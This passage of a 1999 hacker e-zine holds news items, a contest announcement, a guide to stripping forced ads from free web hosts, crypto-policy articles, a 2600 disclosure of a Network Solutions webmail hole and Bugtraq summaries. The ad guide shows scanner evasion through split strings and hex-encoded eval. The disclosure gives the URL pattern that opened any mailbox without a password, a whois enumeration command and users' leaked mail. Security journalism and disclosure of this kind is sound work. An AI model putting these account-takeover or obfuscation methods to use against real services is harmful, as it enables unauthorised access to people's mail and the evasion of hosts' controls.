+ http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ******
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ CRACKING FOR THE MAN (BUS. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/business/story/21879.html
There are plenty of ex-hackers hanging around corporate
America these days, says DefCon's founder. Breaking into
networks is always better when you're paid for it. By
Joanna Glasner.
++ MINDSPRING LINKS WITH EARTHLINK (BUS. 9:00 am)
http://www.wired.com/news/news/email/explode-infobeat/business/story/21903.html
The rival Net service providers will join forces, becoming
the second-largest ISP behind AOL.
++
Thanks to myself for providing the info from my wired news feed and others from whatever
sources, also to Spikeman for sending in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(No mail worthy of posting here this issue,)
Yeah we have a message board, feel free to use it, remember there are no stupid questions...
well there are but if you ask something really dumb we'll just laugh at ya, lets give the
message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
domain comes back online (soon) meanwhile the beseen board is still up...
==============================================================================
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/* We're still here eh? wow. Well nothing much to report, just read and
* be merry. We have a new Croatian correspondant, HWA welcomes Sla5h to
* the fold, check out the News from Sla5h section for stuff from .hr
*
* Cruciphux
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
03.0 Datashark's rootfest challenge
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.provalue.net/users/nomad/hack.txt
DataShark
nomad@provalue.net
-PRESS RELEASE-
At rootfest2k I will be setting up five servers. This is the challange.
The machines will be setup on the rootfest network and configured like a corprate
Mission critical network there will be a POS server (prolly Novell 3.X running
counterpoint) there will be a Email/fax server.(prolly running Linux) there will be
a firewall(there may be week links in the firewall(i.e. a machine connected directly
to the network etc)) there will be a fileserver(prolly running NT(hack it and you can
keep the software) and a webserver. The webserver will be public and hosting webpages
you can get a account on this machine by attaching a Text file to a email stating the
username you would like as well a alternates and a password email to nomad@provalue.net
now for the fun part!
1st prize goes to the person that hacks all five machines first
you get a 3com Palm V or a AMD K-7 500 chip and motherboard
2nd prize goes to the person that has the most creative hack
you get a 3com Palm III or a 4.5 gig SCSI drive and controler card
3rd prize goes to the person that hacks the most con particpants (you must prove this)
you get a Creative Labs NOMAD mp3 player.
Most pathetic person at the con gets a free copy of windows 98 and a 'Kick me I suck' t
I need five volentires to secure the machine's at rootfest you CANNOT be in the
callange BUT if your machine does not get owned you can keep the machine. if you are
interested please email me at nomad@provalue.net
If you are caught DoS attacking the machines or the rootfest network you will be delt
with harshly.
I am looking for hardware and software donations for the machines If you have anything
you would like to donate please email me at nomad@provalue.net
I will also be giving away a machine to the first person to bring me a real FBI badge
it must be real. and should still have the agents photo ID with it. (if anyone has a
problem with this PLEASE email me. I wish to stay on the good side of the law)
@HWA
04.0 HOW-TO Beat the ADS on FWP (Free Webpage Providers)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Smogzer
url: http://smog.cjb.net
email:smogzer@iname.com
HOW-TO Beat the ADS on FWP (Free Webpage Providers) ?
http://smog.cjb.net
Version 0.9
Sep 23 1999 © 1999 SmoG Alert.
INDEX :
Why ?
1 - Pop-ups
1.1 - Removing the Pop-ups
1.2 - Killing pop-ups when they appear
2 - Banners
3 - Make stuff invisible (banners, counters, buttons, text, etc)
4 - Frames
5 - Remove end
6 - Avoiding rule scanners
7 - Make sure users can reach you page
8 - Contributions / Bibliography
9 - Copyright
Why ?
To let amateur webmasters have complete control of what they sites look like.
I'm tired of seeing publicity I didn't asked for and closing pop-ups that I didn't asked to see.
Having to show some advertisement spoils good webdesign.
Most of the time the servers are slow enough without ads.
Webmasters from sites that have publicity don't get any $ for their publicity.
People are trying to offer a service to the community and the only one that gets anything from it are the sponsors.
There's lots of software that blocks ads, by using this techniques viewers don't need to use that kind of software.
1 - Pop-ups :
1.1 - Removing the Pop-ups :
This technique makes the browser ignore the pop-up.
The pop-up is a javascript code, so if we surround the place where the server inserts this code with a <noscript> or a <!-- //-->
(comment) tag the pop-up will be ignored.
· Look at the example for the <!-- (comment) tag:
<!-- Start code //-->
<NOSCRIPT>
<!-- <BODY> --> // the Decoy body tag, it can at the beginning of the head tag too
</NOSCRIPT>
<TITLE>Your Title Here</TITLE>
</HEAD>
<BODY> // The real body tag
· Look at the example for the <noscript> tag:
<!-- Start code //-->
<NOSCRIPT>
<BODY> // the server will insert their code right before or after the <body> tag so any javascript will be ignored
</NOSCRIPT>
· A simpler way in case you don't need to open any windows using javascript is to include this code in every page of the site.
<!-- Start code //-->
<SCRIPT LANGUAGE="JavaScript">
<!--
function open () {return true;} // this will redefine the open function.
//-->
</SCRIPT>
· The jawascript method is used when the server inserts a </noscript> before the pop-up, this way the <noscript> trick won't work so if
I insert a "<SCRIPT LANGUAGE="JawaScript">" (notice that jawascript can be anything, it's only convenience is looking like
javascript) will disable the rest of the script.
<SCRIPT LANGUAGE="JawaScript"> // just insert this line before the place where the pop-up will be.
<!-- -->
</noscript>
<script language="JavaScript">
· This script by "the_omega" allows the opening of all urls in new windows except one called popup.html .
<SCRIPT>
<!--
function ScreenIt(url,name,parm){
if(url.indexOf("popup.html")!=-1) return false;
return window.Xopen(url,name,parm);
}
window.Xopen=window.open;
window.open=ScreenIt;
//-->
</SCRIPT>
1.2 - Killing pop-ups when they appear :
· When a pop-up name open it will have a name, what this script does is open a window with that name and closing it right after.
"w" is name of the window do open and close, this can be anything w is just an example.
To know the "Popupname" you must look at the code the server inserts in your page and get it there.
The window.focus() is optional, it will only make this window become active when the popup closes.
<!-- Start code //-->
<script language="JavaScript">
w=window.open("http://smog.cjb.net","Popupname","");
w.window.close();
window.focus();
<!-- End code //-->
2 - Banners :
· If you need to remove a banner in a place of your choice use the make invisible technique, if the server inserts the code in the end
of the document just use "remove end" of document technique. You can also replace the banner with the image you want.
· If the banner is placed automatically on the beginning of the page, the best thing to do is have a layer filling the space occupied by
the ad. This banner can contain a image or a solid color background.
<LAYER top="27" name="top"><center>
<IMG SRC="http://smog.cjb.net/logo2.gif" width="490" height="95"></center>
</LAYER>
· If the banner is a shtml code like
<NOSCRIPT>
<!--#geoguide-->
</NOSCRIPT>
· It's possible to change the banner to any image you want, your logo or maybe a 1x1 transparent gif .
Change the "src" property of the image by refering to the image number on the page, if the banner is on top it's number must be 0 if
it's the last image on the page you must count all the images, or in case the banner has a "name" property you can replace the
"images[0]" with the "name" value of the image. Just insert this script after the image you want to replace.
<script language="JavaScript">
<!--
document.images[0].src='banners_suck.gif';
-->
</script>
3 - Make stuff invisible (banners, counters, buttons, text, etc) :
· This technique is possible using layers, the variables don't really matter the important this is the "visibility=hide" part.
Just add your invisible stuff to a layer like this:
<ilayer id="invisible" z-index="1" visibility="hide" >Your banners,counters, text here</ilayer>
The "Your banners,counters, text here" will be invisible to everyone viewing your page but not for their browsers.
4 - Frames :
· This code checks for the existence of frames, if they exist the page where you put this code becomes the only page in the browser.
<script language=JavaScript>
if(top!=self){top.location.href=self.location.href;}
</script>
· or have the first page of your site point to a second one with this code on the body:
<body onLoad="window.open('http://smog.cjb.net/html/index.htm','_parent')">
By opening in a _parent window the browser will go to the previous window in the history, this is the one just before the frames and
open the site there.
Sometimes the location that FWP give you is just an alias to your real page location. They use this aliasing method to make users
load a frame, if you know where the real page is located just make some redirector point there.
Just look at the xoom example
"http://members.xoom.com/_XOOM/username/" is your real page location and "http://members.xoom.com/username/" is
the location they use to make viewers load the adframe.
To discover the real location of your site just press right mouse click on your page and look in the "info" panel.
5 - Remove end :
· Sometimes servers add stuff in the end of the pages, to remove it just place <!-- or <noscript> before the place where they're
publicity is going to be, the <!-- comments the rest of the file making it only visible when viewing the source, the <noscript> is used if
the ad comes in form of javascript, disabling it.
6 - Avoiding rule scanners :
· Some servers scan .htm files for suspect code, spliting popups names is useful when escaping this scanners.
var Popup="po"+"pWind"+"ow"; window.onError=null; tasteful=window.open(newpage,wndname,"");
· You should also encode your code in hexadecimal format. When it is encoded put it like this
<SCRIPT>
<!--
eval(unescape("your code in hex here"))
//-->
</SCRIPT>
7 - Make sure users can reach you page:
When/If the FWP services track you they may delete your pages and the usual viewers won't be able to know the next location of your
site, so you better use redirectors. You can find a list of redirectors that don't use ads on my site.
With redirectors your site will look like http://smog.cjb.net , where cjb.net is the name of the redirector and smog is the name of my
site.
8 - Contributions / Bibliography :
Popups must die
Counterexploitation and the Free Webpage Provider
the_omega
This is the end, I hope this tips help anybody make better, or at least less annoying web sites.
Anybody that wishes to contribute to this article should e-mail smogzer@iname.com
COPYRIGHT
This document is Copyright © 1999 Smog Alert smogzer@iname.com . It may be freely redistributed in its entirety, including the whole of this
copyright notice, but may not be changed without permission from the author. Dispensation is granted for copying small verbatim portions for the
purposes of reviews or for quoting; in these circumstances, sections may be reproduced in the presence of an appropriate citation but without
this copyright notice.
05.0 Even More Bad News about CESA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Weld Pond
The Cyberspace Electronic Security Act (CESA) has
even more bad things hidden within it than originally
realized. There are at least two separate provisions that
will keep " sensitive investigative techniques and
industry trade secrets" quit and prevent them from
being disclosed even in court. This means keeping
backdoors and vulnerabilities that the software
manufacturer may know about secret! You aren't even
going to know if your software contains a "recovery
agent". This will also allow the government to use
decrypted evidence in court without revealing how they
decrypted it which means whoever the defendant is will
just have to believe them.
Electronic Privacy Information Center
http://www.epic.org/crypto/legislation/cesa/
Wired
http://www.wired.com/news/news/politics/story/21810.html
Decoding the Crypto Policy Change
by Declan McCullagh
3:00 a.m. 17.Sep.99.PDT
Why did the Clinton administration cave on crypto? What caused the nation's top generals and cops to back down
this week after spending the
better part of a decade warning Congress of the dangers of privacy-protecting encryption products?
Why would attorney general Janet Reno inexplicably change her mind and embrace overseas sales of encryption when as recently as July she
warned Congress of the "rising threat from the criminal community of commercially available encryption?"
See also: Clinton Relaxes Crypto Exports and Crypto Law: Little Guy Loses
It can't simply be that tech firms were pressing forward this fall with a House floor vote to relax export rules. National security and law enforcement
backers in the Senate could easily filibuster the measure. Besides, Clinton had threatened to veto it.
It could be the presidential ambitions of Vice President Gore, who just happened to be in Silicon Valley around the time of the White House press
conference Thursday. Still, while tech CEOs can get angry over the antediluvian crypto regulations Gore has supported, they regard Y2K liability
and Internet taxation as more important issues.
Another answer might lie in a little-noticed section of the legislation the White House has sent to Congress. It says that during civil cases or
criminal prosecutions, the Feds can use decrypted evidence in court without revealing how they descrambled it.
"The court shall enter such orders and take such other action as may be necessary and appropriate to preserve the confidentiality of the technique
used by the governmental entity," Section 2716 of the proposed Cyberspace Electronic Security Act says.
There are a few explanations. The most obvious one goes as follows: Encryption programs, like other software, can be buggy. The US National
Security Agency and other supersecret federal codebreakers have the billion-dollar budgets and hyper-smart analysts needed to unearth the bugs
that are lurking in commercial products. (As recent events have shown, Microsoft Windows and Hotmail have as many security holes as a sieve
after an encounter with a 12-gauge shotgun.)
If the Clinton crypto proposal became law, the codebreakers' knowledge could be used to decipher communications or introduce decrypted
messages during a trial.
"Most crypto products are insecure. They have bugs. They have them all the time. The NSA and the FBI will be working even harder to find them,"
says John Gilmore, a veteran programmer and board member of the Electronic Frontier Foundation.
Providing additional evidence for that view are Reno's comments on Thursday. When asked why she signed onto a deal that didn't seem to provide
many obvious benefits to law enforcement, she had a ready response.
"[The bill covers] the protection of methods used so that ... we will not have to reveal them in one matter and be prevented, therefore, from using
them in the next matter that comes along," the attorney general said.
Funding for codebreaking and uncovering security holes also gets a boost. The White House has recommended US$80 million be allocated to an FBI
technical center that it says will let police respond "to the increasing use of encryption by criminals."
Another reason for the sea change on crypto is decidedly more conspiratorial. But it has backers among civil libertarians and a former NSA analyst
who told Wired News the explanation was "likely."
It says that since the feds will continue to have control of legal encryption exports, and since they can stall a license application for years and
cost a company millions in lost sales, the US government has a sizeable amount of leverage. The Commerce Department and NSA could simply
pressure a firm to insert flaws into its encryption products with a back door for someone who knows how to pick the lock.
Under the current and proposed new regulations, the NSA conducts a technical analysis of the product a company wishes to export. According to
cryptographers who have experienced the process, it usually takes a few months and involves face-to-face meetings with NSA officials.
"This may be a recipe for government-industry collusion, to build back doors into encryption products," says David Sobel, general counsel for the
Electronic Privacy Information Center and a veteran litigator.
Sobel points to another part of the proposed law to bolster his claim: It says any such information that a company whispers to the Feds will remain
secret.
That section "generally prohibits the government from disclosing trade secrets disclosed to it [by a company] to assist it in obtaining access to
information protected by encryption," according to a summary prepared by the administration.
Is there precedent? You bet. Just this month, a debate flared over whether or not Microsoft put a back door in Windows granting the NSA secret
access to computers that run the operating system.
While that widespread speculation has not been confirmed, other NSA back doors have been.
In the 1982 book The Puzzle Palace, author James Bamford showed how the agency's predecessor in 1945 coerced Western Union, RCA, and ITT
Communications to turn over telegraph traffic to the feds.
"Cooperation may be expected for the complete intercept coverage of this material," an internal agency memo said. ITT and RCA gave the
government full access, while Western Union limited the number of messages it handed over. The arrangement, according to Bamford, lasted at
least two decades.
In 1995, The Baltimore Sun reported that for decades NSA had rigged the encryption products of Crypto AG, a Swiss firm, so US eavesdroppers
could easily break their codes.
The six-part story, based on interviews with former employees and company documents, said Crypto AG sold its security products to some 120
countries, including prime US intelligence targets such as Iran, Iraq, Libya, and Yugoslavia. Crypto AG disputed the allegation.
"It's a popular practice. It has long historical roots," says EFF's Gilmore. "There's a very long history of [the NSA] going quietly to some ex-military
guy who happens to run the company and say, 'You could do your country a big favor if...'"
Could the security flaw be detected? Probably not, said Gilmore, who during a previous job paid a programmer to spend months disassembling parts
of Adobe's PostScript interpreter. "Reverse engineering is real work. The average company would rather pay an engineer to build a product rather
than tear apart a competitors'."
@HWA
06.0 NSI Opens New Email Hole
~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Macki
Last week Network Solutions Inc. made a major security
blunder by automatically opening unwanted email
accounts for all of its customers and then mailing the
easily guessable passwords to them in the clear. They
have since revamped their free email system.
Unfortunately the new system also has a gaping hole
allowing anyone with an account to read anyone else's
email.
2600
http://www.2600.com/2600new/092099.html
update 9/24/99:
A full business week has now gone by since we revealed this
security hole. Apart from a story in the Boston Globe and ZDTV,
the rest of the media chose to ignore this completely. Wired even
wrote us to say "we do not believe this represents either a security
or a privacy risk." It's hard to imagine what could be *more* of a
security and privacy risk than a company running insecure software
while attempting to get *all* administrative and technical contacts
for *every* .com, .net, and .org site to use their system as a trusted
method of communication.
As of today, most of the problems seem to have been fixed,
although we are still hearing from people who claim to have
thousands of accounts in their browser cache which can still be
logged into. Also, as of this date, no public comment has been issued
on the web sites of Network Solutions, Inc. or Critical Path, Inc.,
the company that NSI hired to operate its web mail sites.
Spokespersons from Critical Path have been quoted as saying they
take responsibility for this mess but we believe a more public and
lasting statement is in order.
update 9/21/99:
It's been a day since this problem was disclosed to the public, and
almost a week since it was brought to NSI's attention. They have
still yet to comment on the matter.
The page that allowed people to access arbitrary email accounts has
been disabled by NSI. However, if you happen to know the URL
for an email box, you can still access it. For instance you can send
email as microsoft@dotcomnow.com *here. Within 5 minutes of
this URL being posted the account was disabled. STAY TUNED!
*http://mail.dotcomnow.com/mail/compose/microsoft/0d472389db5e137350a29516aa7e8c32
As of 7:20 PM EDT, a URL to access the support account's email
was working. As we were preparing to post a link, it too was
disabled. Perhaps somone is paying attention.
NEW INTERNIC EMAIL SECURITY HOLE
9/20/99
We have been alerted to a serious vulnerability on a free web-based
e-mail service that has recently been launched by Network
Solutions Inc., otherwise known as the Internic - the people
responsible for registering nearly all .com, .net, and .org addresses.
Anyone taking them up on their offer for "free web mail" on their
www.networksolutions.com/ page is both vulnerable and capable of
accessing ANY ACCOUNT on the following domains:
dotexpress.com
mymailbag.com
nsimail.com
dotcomnow.com
Once you have registered an account on their system, you can
change the name of your account to ANY OTHER ACCOUNT
simply by entering this URL:
http://mail.dotcomnow.com/signup/poll/newaccount?dlang=default
NO PASSWORD IS REQUIRED.
Simply replace newaccount with the name of the account you would
like to access and you're in!
While it's a trivial matter to guess user names, if you want a small
list from the Internic's own database, simply type:
whois '*@dotexpress.com'
or any of the other domains they are currently running.
According to the people who have alerted us of this vulnerability,
NSI was informed of the security hole last week and failed to
respond. We believe this may help motivate them.
Have a look at some of the mail that is world readable on NSI's
system. These people thought they were sending mail to the
webmaster of the site. What's particularly ironic is the large number
of people who were complaining about the easily guessable
passwords that were mailed out - they never suspected that it was
even easier to compromise their accounts without having to even
guess the password!
Look at the mail here : http://www.2600.com/2600new/092099-mail.html
(Reprinted below)
9/20/99
The following are samples of the mail that is world readable on NSI's system. These people thought they
were sending mail to the webmaster of the site. What's particularly ironic is the large number of people who
were complaining about the easily guessable passwords that were mailed out - they never suspected that it
was even easier to compromise their accounts without having to even guess the password!
------- Start of forwarded message -------
Subject: Whoops
To: webmaster@dotcomnow.com
From: pross@dotcomnow.com
Date: 17 Sep 1999 11:17:44 -0700
Screwed that one up, eh? I accidentally type in the wrong username, put
the matching password (random passwords? Wot's that, then?) and I get
into the wrong account.
Deary me. I'd better leave before someone notices.
-------------------------------------------------
Get personalized e-mail and a web address or your
own free e-mail at http://www.networksolutions.com.
------- End of forwarded message -------
------- Start of forwarded message -------
Subject: Problem with email account
To: webmaster@dotcomnow.com
From: locke30@dotcomnow.com
Cc: webmaster@netsol.com
Date: 16 Sep 1999 17:10:57 -0700
The following is what I set my vacation message to after changing my
password to some random garbage... I decided to entertain myself by
sending you a copy:
The idiots at Network Solutions decided to open
thousands of accounts for its customers using easily
guessable passwords (hint: really easy) These accounts
were created without any input. And NSI was kind
enough NOT to provide any means of removing them.
With noise on the internet account about the account
making it easier to hyjack domain names (gee... thanks
NSI!) I was forced to log in and change my password (as
were thousands of other people)
Network Solutions: Yes were a monopoly damnit! (tm)
If you wish to contact me, do a whois lookup for
shivan.org, which was the domain that I registered with
NSI that got me all this neat spam and free unsolicited
wideopen email accounts.
-- Bruce Locke (locke30)
-------------------------------------------------
Get personalized e-mail and a web address or your
own free e-mail at http://www.networksolutions.com.
------- End of forwarded message -------
------- Start of forwarded message -------
Subject: GET YOUR SECURITY RIGHT!!!
To: postmaster@netsol.com
From: webmaster@dotcomnow.com
Cc: postmaster@dotcomnow.com, root@netsol.com
Date: 16 Sep 1999 05:36:14 PDT
This Web Mail service is one big security hole. I can login to over two
dozen accounts, just using 'lastname' and password 'lastnamensi'.
'webmaster' with 'webmasternsi' did work as well, just like 'admin' with
'adminnsi'.
Jeez man, wake up and smell the fire....
barbaBob
(P.S.: the password for this account has been changed to 'tralala'. There
is a lot of e-mail here from concerned netizens trying to warn you guys.
I suggest you read them)
-------------------------------------------------
Get personalized e-mail and a web address or your
own free e-mail at http://www.networksolutions.com.
------- End of forwarded message -------
------- Start of forwarded message -------
Subject: You are in serious violation of critical path's policy
From: cp@dotcomnow.com
Cc: recipient list not shown: ;
Date: 16 Sep 1999 10:53:03 -0700
Dear sir or madam,
We realize that you have compromised the security of our company by
changing the password of this account. We require that you change the
password to 'critcalpath'
You must reply to us immediately once you have changed it so that we
can stop the current investigation and legal charges being brought
against you.
Thank You,
Critical Path
-------------------------------------------------
Get personalized e-mail and a web address or your
own free e-mail at http://www.networksolutions.com.
------- End of forwarded message -------
------- Start of forwarded message -------
Subject: What in the Heck were you thinking?
To: webmaster@dotcomnow.com
From: verpoorten@dotcomnow.com
Cc: help@dotcomnow.com
Date: 16 Sep 1999 08:03:10 -0700
What in the world were you thinking? You set up an e-mail acct in my name
and gave me a password which was the same for every domain name (acct name
and a "nsi" after it) and emailed me the acct and password without me
setting it up, clearing it, or acces
sing it first?
This has got to be the worse example of exploitation I have ever seen
with a business in your position and trust. I fear for the safety of my
Domain name, my good name, and my checkbook with you in charge of Domain
names now.
I do not want any mail acct opened without my OK.
Man, what in the name of God and all that is Holy was your company
thinking when it pulled this idiotic stunt?!
-------------------------------------------------
Get personalized e-mail and a web address or your
own free e-mail at http://www.networksolutions.com.
------- End of forwarded message -------
------- Start of forwarded message -------
Subject: Re: your message
To: postmaster@INTEGRAM.ORG, root@INTEGRAM.ORG, info@INTEGRAM.ORG,
postmaster@INTEGRAM.ORG, webmaster@INTEGRAM.ORG, hostmaster@netsol.com,
postmaster@netsol.com, info@networksolutions.com,
postmaster@networksolutions.com, webmaster@dotcomnow.com,
info@dotcomnow.com, postmaster@dotcomnow.com
From: Joost Baaij
Date: Thu, 16 Sep 1999 15:58:26 +0200
Dear integram/network solutions
I do not appreciate getting e-mail messages like this. I sincerely hope
you will never bother me again in the future.
As far as your web-based email service is concerned, i think it's an
unprecedented fiasco by generating easy to guess passwords. I STRONGLY
suggest you IMMEDIATELY take action and modofy ALL passwords on that
system.
I've heard several reports of people breaking into the dotcomnow email
service that weren't supposed to. I'm stunned and shocked to see your
company do such an utterly DUMB thing. Please correct it NOW.
--
------------------------------------------------------------------------
Barito Innovators B.V.
Joost Baaij De Mulderij 4, 3831 NV Leusden
P.O. Box 387, 3830 AK Leusden
The Netherlands
Phone +31 (0)33 494 79 71
j.baaij@barito.nl Fax +31 (0)33 494 85 44
Internet http://www.barito.nl
------------------------------------------------------------------------
------- End of forwarded message -------
------- Start of forwarded message -------
To: webmaster@nsi.com
From: lewis@dotcomnow.com
Cc: webmaster@dotcomnow.com
Date: 16 Sep 1999 06:08:38 -0700
god you guys suck
nice default passwords
morons
-------------------------------------------------
Get personalized e-mail and a web address or your
own free e-mail at http://www.networksolutions.com.
------- End of forwarded message -------
------- Start of forwarded message -------
Subject: you people fucking stupid or what
To: webmaster@dotcomnow.com
From: testa28@dotcomnow.com
Date: 16 Sep 1999 05:32:59 -0700
what in the hell where you people thinking by sending out generic
passwords for every acct. Are your security people just stupid or what?
Since you've been monopolizing the domain world for so long, has all
common sense gone to the wayside? I can't believe the number of idiots
that work there and that anyone thought this was a good idea. Since i'm
up for renewal in 3 months, i'll have to seriously contemplate staying
with people who are ignorant and stupid.
-------------------------------------------------
Get personalized e-mail and a web address or your
own free e-mail at http://www.networksolutions.com.
------- End of forwarded message -------
------- Start of forwarded message -------
Subject: security?
(or complete lack thereof)
To: hostmaster@netsol.com, webmaster@dotcomnow.com
From: hostmaster360@dotcomnow.com
Cc: aaron@abelard.com
Date: 16 Sep 1999 01:04:25 -0700
you've got to be kidding me. your lack of any forethought in assinging
passwords has turned a potentially useful system into a potentially large
problem.
aaron abelard / aa203
-------------------------------------------------
Get personalized e-mail and a web address or your
own free e-mail at http://www.networksolutions.com.
------- End of forwarded message -------
------- Start of forwarded message -------
Subject: Re:
To: lewis@dotcomnow.com
From: webmaster@dotcomnow.com
Date: 17 Sep 1999 23:27:34 PDT
Hi Luie,
That ain't the half of it...
Why don't you be webmaster....
http://mail.dotcomnow.com/signup/poll/webmaster?dlang=default
On Thu, 16 September 1999, lewis@dotcomnow.com wrote:
>
>
> god you guys suck
>
> nice default passwords
>
> morons
>
>
>
> -------------------------------------------------
> Get personalized e-mail and a web address or your
> own free e-mail at http://www.networksolutions.com.
-------------------------------------------------
Get personalized e-mail and a web address or your
own free e-mail at http://www.networksolutions.com.
------- End of forwarded message -------
------- Start of forwarded message -------
Subject: You boneheads
To: postmaster@dotcomnow.com
From: droelands@dotcomnow.com
Date: 16 Sep 1999 17:36:40 -0700
Thanks for nothing.
You create an email account in my name, without my consent, and assign it
a password that is incredibly easy to hack?
What have you been inhaling?
I have no intent to use this service. I configured my password simply to
protect myself. Furthermore, when my domains expire, I'll be sure to
re-register them with another service.
Morons...
-------------------------------------------------
Get personalized e-mail and a web address or your
own free e-mail at http://www.networksolutions.com.
------- End of forwarded message -------
------- Start of forwarded message -------
Subject: How stupid can you be?!?!?!?!
To: admin@dotcomnow.com, root@dotcomnow.com, postmaster@dotcomnow.com
From: toups2@dotcomnow.com
Date: 16 Sep 1999 06:53:53 -0700
First off, what right does Network Solutions have spamming my mailbox
with your web based mail service. Just because I HAVE to use your
monopolistic service to register domains DOES NOT give you the right to
SPAM my work e-mail account.
Second, is their cow manure in place of brains in your head? How dare you
send out a clear text password that effects my domains in e-mail? What
Mickey Mouse Security Course did you take?
I will be writing my congressman and senator to insure that Network
Solution loses all ability to manage domain names. This behavior is the
absolute worst and should not be rewarded.
Sincerely yours,
A VERY DISGRUNTLED DOMAIN OWNER
-------------------------------------------------
Get personalized e-mail and a web address or your
own free e-mail at http://www.networksolutions.com.
------- End of forwarded message -------
@HWA
07.0 Security Focus Newsletter for September
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 20 Sep 1999 10:42:15 -0700
Reply-To: Alfred Huger <ah@SECURITYFOCUS.COM>
Sender: SF-NEWS Mailing List <SF-NEWS@SECURITYFOCUS.COM>
From: Alfred Huger <ah@SECURITYFOCUS.COM>
Subject: Security Focus Newsletter #7
X-To: sf-news@securityfocus.com
To: SF-NEWS@SECURITYFOCUS.COM
Security Focus Newsletter #07
Table of Contents:
I. INTRODUCTION
II. BUGTRAQ SUMMARY
1. Hotmail Javascript STYLE Vulnerability
2. Netscape Enterprise SSL Handshake Patch Accept Buffer Overflow Vulnerability
3. NetcPlus @Work SmartServer3 SMTP Buffer Overflow
4. Computalynx CMail SMTP Buffer Overflow Vulnerability
5. NT RASMAN Privilege Escalation Vulnerability
6. FuseWare FuseMail POP Mail Buffer Overflow Vulnerability
7. Multiple Vendor CDE dtaction Userflag Buffer Overflow Vulnerability
8. Multiple Vendor CDE dtspcd Vulnerability
9. Multiple Vendor CDE ttsession Vulnerability
10. Multiple Vendor CDE TT_SESSION Buffer Overflow Vulnerability
11. FreeBSD fts Library Buffer Overflow Vulnerability
III. PATCH UPDATES
1. Vendor: ProFTP
IV. INCIDENTS SUMMARY
1. Stray FIN packets...
V. VULN-DEV RESEARCH LIST SUMMARY
1. Guestbook perl script (long) (Thread)
2. VULN-DEV Administrivia #2143
3. Administrivia #2685
4. [Fwd: your guestbook]
VI. SECURITY JOBS
Seeking Employment:
1. Contact: M Simkin <msimkin@primenet.com>
Seeking Staff:
1. Nokia: SE Position Routing/Firewall/VPN
2. System Administrator - Unix - New York City
3. Chief Security Officer #406
4. Computer Systems Programmer
5. Information Security Analyst
6. Information Security Engineer
7. Project Manager for the Information Security Group
VII. SECURITY SURVEY RESULTS
VIII. SECURITY FOCUS EVENTS
1. New Features In Tools Section
IX. SECURITY FOCUS TOP 6 TOOLS
1. Stack Shield 0.5 beta (UNIX)
2. rinetd (for Win9x/NT)
3. rinetd (UNIX)
4. Subotronic (Win9x/NT)
5. ShoWin (Win9x/NT)
6. Boping (Win9x/NT)
X. SPONSOR INFORMATION - Tripwire Security
I. INTRODUCTION
Welcome to the 7th edition of the Security Focus Newsletter. The last week
has been a busy one with Security Focus with the high point being that we
are now moved to a higher bandwidth facility to better meet user demands.
II. BUGTRAQ SUMMARY 1999-09-11 to 1999-09-19
---------------------------------------------
1. Hotmail Javascript STYLE Vulnerability
BUGTRAQ ID: 630
Remote: Yes
Date Published: 1999-09-13
Relevant URL:
http://www.securityfocus.com/bid/630
Summary:
The HTML STYLE command can be used to embed Javascript into Hotmail email
messages. The STYLE tag circumvents current methods employed by Hotmail to
disable Javascript from email messages. When viewed by a Microsoft IE 5.0
or Netscape Navigator 4.X browser, the Javascript in the email may execute
various commands on the viewer's mailbox. The commands could take various
actions on the user's inbox, including: reading email, deleting email, or
prompting users to re-enter their password in a trojan application.
2. Netscape Enterprise SSL Handshake Patch Accept Buffer Overflow
Vulnerability
BUGTRAQ ID: 631
Remote: Yes
Date Published: 1999-09-13
Relevant URL:
http://www.securityfocus.com/bid/631
Summary:
The Enterprise Server 3.6 SP2 with the SSL Handshake Patch applied is
vulnerable to a buffer overflow that will DoS the service and may allow
arbitrary commands to be executed on the web server.
3. NetcPlus @Work SmartServer3 SMTP Buffer Overflow
BUGTRAQ ID: 632
Remote: Yes
Date Published: 1999-09-13
Relevant URL:
http://www.securityfocus.com/bid/632
Summary:
There is a buffer overflow on the @Work SmartServer3 SMTP service (long
MAIL FROM:) that may allow an intruder to execute arbitrary code on the
target server.
4. Computalynx CMail SMTP Buffer Overflow Vulnerability
BUGTRAQ ID: 633
Remote: Yes
Date Published: 1999-09-13
Relevant URL:
http://www.securityfocus.com/bid/633
Summary:
There is a buffer overflow in the CMail SMTP service (long MAIL FROM:)
that may allow an attacker to execute arbitrary code on the target server.
5. NT RASMAN Privilege Escalation Vulnerability
BUGTRAQ ID: 645
Remote: Yes
Date Published: 1999-09-17
Relevant URL:
http://www.securityfocus.com/bid/645
Summary:
Any authenticated NT user (IE domain user) can modify the pathname for the
RASMAN binary in the Registry. The next time the RAS Service is started,
the (trojan) service referenced by the RASMAN pathname will be executed
with system privileges. This trojan service may allow the User to execute
commands on the target server as an administrator, including elevating the
privileges of their own account to that of Administrator.
6. FuseWare FuseMail POP Mail Buffer Overflow Vulnerability
BUGTRAQ ID: 634
Remote: Yes
Date Published: 1999-09-13
Relevant URL:
http://www.securityfocus.com/bid/634
Summary:
